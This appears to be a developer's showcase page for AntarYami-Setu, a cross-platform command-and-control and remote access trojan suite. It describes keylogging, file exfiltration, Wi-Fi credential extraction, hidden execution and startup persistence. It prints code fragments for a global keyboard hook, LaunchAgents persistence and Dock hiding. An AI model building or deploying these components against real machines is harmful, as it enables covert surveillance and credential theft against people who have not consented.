Red Team C2 Ecosystem

ANTARYAMI-SETU

A dual-mode, cross-platform remote telemetry and infrastructure management suite. Designed to provide seamless remote administration, real-time metrics, and operational command lines over direct TCP sockets and firewall-friendly HTTP APIs.

Core Intelligence

Understanding the foundation of the platform: What is it, and why does it exist?

What is AntarYami?

"AntarYami" (Sanskrit: अन्तर्यामी) translates to "The Inner Controller" or "The All-Knowing Knower within".

AntarYami-Setu (meaning "The Inner Bridge") is a multi-tier Command and Control (C2) and Remote Administration Tool (RAT) ecosystem. The platform enables secure, stealthy, and persistent remote system management and auditing of endpoint machines.

Unlike generic tools, it supports **dual connection pathways** to adapt to any network environment. It bridges the gap between administrators and targets by managing raw telemetry, background shell executions, and global inputs from a central WinForms hub or a web-relay PHP backend.

Why Did I Build It?

I engineered the AntarYami Ecosystem to push the limits of low-level Windows APIs, network socket performance, and payload design. Building a C2/RAT from scratch teaches concepts that no textbook can:

1. Direct Network Architectures: Programming custom raw TCP socket channels vs HTTP pulling APIs to test persistence over strict corporate proxies.

2. OS Internals & Security Auditing: Manipulating low-level Win32 Hooks (such as keyboard surveillance), registry injections for startup survival, and background daemon lifecycles on macOS.

3. Firewall Bypass Mechanisms: Demonstrating how HTTP POST polling can blend into regular SSL web traffic, proving standard firewalls can easily bypass inbound blocks if the client makes outbound calls.

Functional Feature Matrix

Cross-platform capability breakdown comparison between local sockets and wide-area web channels.

Capability / Feature 📡 WinOffline Agent (TCP LAN) 🌐 WinOnline Agent (HTTP WAN) 🍎 MacOnline Agent (HTTP WAN)
Connection Topology Direct TCP (9999) HTTP Polling API HTTP Polling API
Latency & Heartbeat Real-time (<10ms) 3s - 5s Polling 5s fetch, 10s telemetry
Remote Screen Capture Live Stream (JPEG GDI+) Static Screenshot Static PNG (screencapture)
Interactive File Manager Visual Tree/List UI Command Line Command Line (`cd`/`cat`)
Clipboard Read/Write Full STA Sync Not Supported Not Supported
Keystroke Hook (Keylogger) Real-time Hook Buffered Periodic upload Disabled (Requires TCC)
File Exfiltration (Pull) Direct Sockets Server uploads/ Vault Server uploads/ Vault
File Injection (Push) Direct Sockets Web Download Web Download
Command Execution Interactive Cmd/PS Job queue Cmd/PS Job queue Zsh
Custom Audio Alerts / TTS TTS synthesis / Beeps Beep commands AppleScript Beeps / `say`
Startup Persistence Registry Run Keys Registry Run Keys LaunchAgents daemon plist
Background Stealth Windowless process Windowless process plist LSUIElement

System Architecture

Visual workflow and component division of the ANTARYAMI-SETU ecosystem.

ANTARYAMI-SETU Architecture Workflow Diagram
Tactical C2 Communications and Execution Matrix

Admin Dashboard

Built in C# using .NET 10.0 Windows Forms. Serves as COMMAND center hosting direct TCP socket listeners (Port 9999) and polls the C2 Web Gateway database for remote nodes.

WinOffline Agent

Designed for low-latency direct-TCP LAN networks. Hooks Windows APIs silently, providing live video feeds and direct registry modifications with minimal footprint.

PHP C2 Web Gateway

Relays commands and binary uploads asynchronously via `api_setu.php` to a MySQL database, enabling communication across NAT and local packet filters.

WinOnline Agent

Executes outbound HTTP/S polling towards the C2 Gateway. Circumvents inbound port blocks by utilizing standard SSL ports (80/443).

macOS Online Agent

Cross-compiled Universal app bundle for Apple Silicon and Intel. Integrates LaunchAgents daemon hooks and zsh command redirects for silent background execution.

Agent Chronicles

Deep dive into the operational mechanics, persistence, and design details of each agent module.

WinOffline Agent
WinOnline Agent
macOS Online Agent

Windows Offline Agent (WinOfflineAgent)

The **WinOffline Agent** is built specifically for local network topologies or direct IP access scenarios. Operating on a raw binary communication paradigm via **TCP Sockets on Port 9999**, it sidesteps high-bandwidth serializers like JSON or XML, ensuring sub-millisecond execution loops.

This module is heavily reliant on native Win32 DLL assemblies. Through kernel mappings (P/Invoke), it controls process frames, streams screen layouts asynchronously, hooks keyboards globally, and updates clipboards through apartment state wrapper threads.

  • Low-Latency Shells: Instantly connects stdout/stderr pipelines of active processes to the dashboard listener.
  • Live GDI+ Screen Shares: Compresses frames on-the-fly to 60% JPEG index before dispatching them as binary frames.
  • Direct File Exchange: Streamlines binary reads and writes over raw socket streams.
  • STA Clipboard Intercept: Safely calls COM-bound clipboard APIs on isolated STA threads to avoid crashes.

📡 Specifications

  • LanguageC# (.NET 10.0)
  • Network ModeRaw TCP Sockets
  • Target Port9999 (Listen/Connect)
  • Heuristics FootprintMedium (Native Hooks)
  • Registry PersistenceHKCU Run Startup
  • Stealth ClassConsole Window Hide

Windows Online Agent (WinOnlineAgent)

The **WinOnline Agent** is engineered to survive environments where inbound connections are blocked (behind router firewalls or NAT proxies). Rather than listening for socket connections, it triggers outbound RESTful HTTP requests directed to `api_setu.php`.

All command queues and files are stored and managed inside a central MySQL database. The agent checks for pending commands periodically (every 5 seconds) and replies with execution output using multipart form transfers.

  • Firewall Traversal: Connects outwards on standard web ports (80/443), bypassing router blocks.
  • File Vault Exfiltration: Standardizes exfiltrated data by uploading files directly to the server's `/uploads/` subdirectory.
  • Buffered Keylogging: Stores keyboard inputs inside a local thread-safe thread cache before uploading them.
  • Wi-Fi profile extraction: Extracts cleartext credentials for previously associated Wi-Fi access points.

🌐 Specifications

  • LanguageC# (.NET 10.0)
  • Network ModeHTTP/S Polling (POST/GET)
  • C2 Endpointapi_setu.php
  • Polling Interval5 seconds
  • Registry PersistenceHKCU Run Startup
  • Stealth ClassProcess.WindowStyle Hidden

macOS Online Agent (MacOnlineAgent)

The **macOS Online Agent** is a specialized C# C2 background runner built using the .NET 10 macOS runtime environment. Its primary objective is stealthy status tracking and command dispatching on macOS targets.

It runs silently in the background by setting the `LSUIElement` parameter to true inside its application package, completely removing Dock icons and menu presence. It integrates with macOS native components by routing commands to `/bin/zsh` and persisting via plist configurations.

  • LaunchAgents Persistence: Generates a custom plist configuration inside `~/Library/LaunchAgents/com.antaryami.maconlineagent.plist`.
  • AppleScript integration: Leverages command processes (`osascript`) to show overlay alerts and execute system beeps.
  • Native Screen Grabs: Captures display screens using `/usr/sbin/screencapture` and posts PNG arrays directly to the PHP API.
  • Stealth Bundle packaging: Pre-configured with a universal compilation structure supporting Apple Silicon (ARM64) and Intel (x64).

🍎 Specifications

  • LanguageC# (.NET 10.0 macOS)
  • Network ModeHTTP/S Polling (POST/GET)
  • Persistence ModeLaunchAgents plist
  • Default Shell/bin/zsh -c
  • Universal BinaryYes (arm64 & x64)
  • Stealth ClassLSUIElement Plist Wrapper

Detailed Technology Stack

System components, development languages, frameworks, and low-level API libraries.

Admin Command Suite

Core Runtime.NET 10.0
Primary LanguageC# (WinForms)
GUI FrameworkWindows Forms API
Socket ModelAsynchronous TCP Server
HTTP ClientSystem.Net.Http
2D EngineGDI+ Drawing / DoubleBuffering

Windows Target Agents

Core Runtime.NET 10.0 Console
LanguagesC# (P/Invoke bindings)
API Bindingsuser32.dll / gdi32.dll / kernel32.dll
Key HookWH_KEYBOARD_LL (Hook 13)
Registry APIMicrosoft.Win32.Registry
Speech EngineSystem.Speech.Synthesis

macOS Target Agent

Core Runtime.NET 10.0 macOS CLI
LanguagesC# (Zsh / CLI wrappers)
Default Shell/bin/zsh
GUI WrapperLSUIElement App Bundle
Startup EngineLaunchd plist daemon
Script Bridgeosascript (AppleScript)

Core Algorithms & Execution Mechanics

Examine the code structures, equations, and algorithms that run inside the C2 command channels.

Protocol Mechanics: For low-latency raw TCP sockets, we send a 5-byte header frame followed by a variable length payload. This completely replaces slow JSON/XML serialization formats.
// Structure: [1-Byte Type] [4-Bytes Payload Length (BigEndian)] [N-Bytes Payload]
byte packetType = 0x08; // Live stream frame identifier
byte[] payloadBytes = GetStreamFrameBytes();
byte[] headerBytes = new byte[5];
headerBytes[0] = packetType;

// Copy the payload length into the 4 bytes header block
byte[] lenBytes = BitConverter.GetBytes(payloadBytes.Length);
Array.Copy(lenBytes, 0, headerBytes, 1, 4);

// Write combined buffer to network stream
networkStream.Write(headerBytes, 0, headerBytes.Length);
networkStream.Write(payloadBytes, 0, payloadBytes.Length);
networkStream.Flush();
SHA-256 Identification: Agents generate a unique identifier by combining system variables and computing a SHA-256 hash. A suffix is appended to identify the agent type.
// Concatenate machine details to build a target signature
string rawHardwareString = Environment.MachineName + Environment.UserName;
using (SHA256 sha256 = SHA256.Create())
{
    byte[] rawHashBytes = sha256.ComputeHash(Encoding.UTF8.GetBytes(rawHardwareString));
    string hexString = BitConverter.ToString(rawHashBytes).Replace("-", "").ToLower();
    
    // Generate unique ID: first 12 bytes of hash + connection suffix
    _deviceId = hexString.Substring(0, 12) + "_SETU_MAC"; // (_SETU_WEB for WinOnline, _SETU for WinOffline)
}
LSUIElement Configuration: To suppress macOS system windows and Dock icons, the Info.plist key `LSUIElement` is injected. This marks the app package as an invisible helper agent.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>CFBundleIdentifier</key>
    <string>com.antaryami.maconlineagent</string>
    <key>CFBundleName</key>
    <string>MacOnlineAgent</string>
    <!-- Suppress dock and windows presence -->
    <key>LSUIElement</key>
    <true/>
</dict>
</plist>
LaunchAgents Persistence: The macOS agent maintains persistence across logins by placing a plist control file under LaunchAgents directories.
// Path: ~/Library/LaunchAgents/com.antaryami.maconlineagent.plist
string plistContent = @"<?xml version=""1.0"" encoding=""UTF-8""?>
<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ""http://www.apple.com/DTDs/PropertyList-1.0.dtd"">
<plist version=""1.0"">
<dict>
    <key>Label</key>
    <string>com.antaryami.maconlineagent</string>
    <key>ProgramArguments</key>
    <array>
        <string>" + appBinaryPath + @"</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <true/>
</dict>
</plist>";
Low-Level Hook Procedure: Logs keystrokes globally by intercepting windows messages via standard WH_KEYBOARD_LL Windows procedures.
private IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
    if (nCode >= 0 && (wParam == (IntPtr)WM_KEYDOWN || wParam == (IntPtr)WM_SYSKEYDOWN))
    {
        int virtualKeyCode = Marshal.ReadInt32(lParam);
        string decodedKeyString = TranslateVirtualKey(virtualKeyCode);
        
        // Append window title indicators on context switch
        AppendActiveWindowTitleIfChanged();
        
        lock (_keyLock)
        {
            _keyBuffer.Append(decodedKeyString);
        }
    }
    return CallNextHookEx(_hookId, nCode, wParam, lParam);
}
Custom Codec Parameters: Captures screen bitmaps and uses GDI+ encoder configurations to compress payload sizes by over 90% before TCP transmission.
private byte[] CompressScreenFrame(Bitmap screenFrame, long qualityFactor)
{
    ImageCodecInfo jpegEncoder = GetEncoder(ImageFormat.Jpeg);
    using (EncoderParameters encoderParams = new EncoderParameters(1))
    {
        using (EncoderParameter parameter = new EncoderParameter(Encoder.Quality, qualityFactor))
        {
            encoderParams.Param[0] = parameter;
            using (MemoryStream stream = new MemoryStream())
            {
                screenFrame.Save(stream, jpegEncoder, encoderParams);
                return stream.ToArray();
            }
        }
    }
}

Platform Security & Auditing Boundaries

A vulnerability and defense analysis comparing modern Windows 11 vs macOS Sequoia systems.

Windows 11 Defense Barriers

Windows Defender & AMSI

Heuristic scanners actively monitor suspicious process chains like hidden CMD/PowerShell threads spawned from unsigned executables running under CommonApplicationData (`ProgramData`). PowerShell code run via the command bridge triggers AMSI buffers before execution.

Registry Startup Protections

Modifications to user startup paths (`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`) by unsigned files triggers automatic alert patterns, requiring code signatures or privilege elevations.

User Account Control (UAC)

Agents running within low-integrity user execution contexts are blocked from accessing critical administrative folders, editing hardware registers, or hooking high-priority processes.

macOS Sequoia Defense Barriers

Gatekeeper & Translocation

macOS sandboxes unsigned bundles by running them from random read-only virtual paths (app translocation) to prevent dynamic link hijacking and system integrity overrides.

TCC Permissions (Transparency & Consent)

Access to core APIs (like `screencapture`) requires explicit approval in "System Settings -> Privacy & Security -> Screen Recording". Accessibility hooks require root authorization or profile configuration.

Background Notifications

Whenever a new plist file registers in `LaunchAgents` directories, macOS triggers a system notification popup warning the user that a new background task has registered to run at load.

Developer's Manifesto

Insights from the developer behind the engineering of the AntarYami Ecosystem.

Ragib Uddin (RK)

Ragib Uddin (RK)

Lead Architect & Security Researcher

More Than Just Code: The Sacrifice Behind AntarYami Setu

I have always believed that software shouldn't just be an execution script; it should be a reflection of a developer’s soul. Today, I am incredibly proud to announce the launch of my most ambitious project yet: AntarYami Setu.

Building AntarYami Setu from the ground up was never just a coding task. It has been a long, demanding journey defined by sleepless nights, thousands of refactored lines of code, and a years-long obsession with the silent, complex world of Windows internals. As a field-oriented system, AntarYami Setu stands as a testament to every compile-time failure I've overcome and everything I have learned about stealth persistence, secure remote sockets, and low-level system control.

What makes AntarYami Setu my heart and soul? It is built on three key engineering pillars that define its core strength:

  • Deep Windows Kernel & API Hooks: Manipulating low-level Win32 procedures and APIs to monitor telemetry and inputs silently.
  • Stealth & Operational Integrity: Operating completely windowless with zero console overhead or system footprints.
  • Hardened Remote Architecture: Dual-mode persistent communication tunnels designed to withstand network disruptions and firewall filters.

Stealth Compilation Guides

Package the C# source directories into dependency-free, silent background executables.

Windows Compilation (PowerShell)
# Compile to a standalone single-file Windows binary that runs hidden
dotnet publish -c Release -r win-x64 --self-contained true -p:PublishSingleFile=true -p:AssemblyName=AntaryamiWinAgent
macOS Compilation (bash)
# Package as a universal application bundle using automated scripts
chmod +x build_app.sh
./build_app.sh